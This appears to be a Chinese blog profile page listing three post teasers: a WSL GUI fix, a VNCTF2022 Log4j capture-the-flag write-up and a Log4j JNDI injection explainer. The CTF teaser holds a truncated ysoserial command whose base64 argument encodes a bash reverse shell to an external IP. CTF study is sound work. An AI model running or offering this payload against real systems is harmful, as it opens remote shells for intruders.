自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(3)
  • 收藏
  • 关注

原创 使wsl的ubuntu 支持可视化(GUI)窗口

使wsl的ubuntu 支持可视化(GUI)窗口用着wsl的时候,在遇到可视化界面弹出窗口的时候,会报错_tkinter.TclError:nodisplaynameandno$DISPLAYenvironmentvariable使用Xming解决这个问题

2022-12-15 21:07:39 1364 2

原创 【Log4j2】VNCTF2022 misc-minecraft log4j反弹shell复现

##POChintmc的flag在/flagMisc mc :hint log4j jdk8u261commons-collections-3.2.1.jar使用ysoserial.jar生成反序列化数据java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yMDkuMTQxLjMyLjc3LzIzMjIzIDA+JjE=}|{base6

2022-04-25 17:01:20 4114

原创 log4j反弹shell

漏洞描述Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。本次远程代码执行漏洞正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记录到日志时,攻击者通过构造特殊请求,来触发 Apache

2022-04-25 16:52:56 4415 5

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除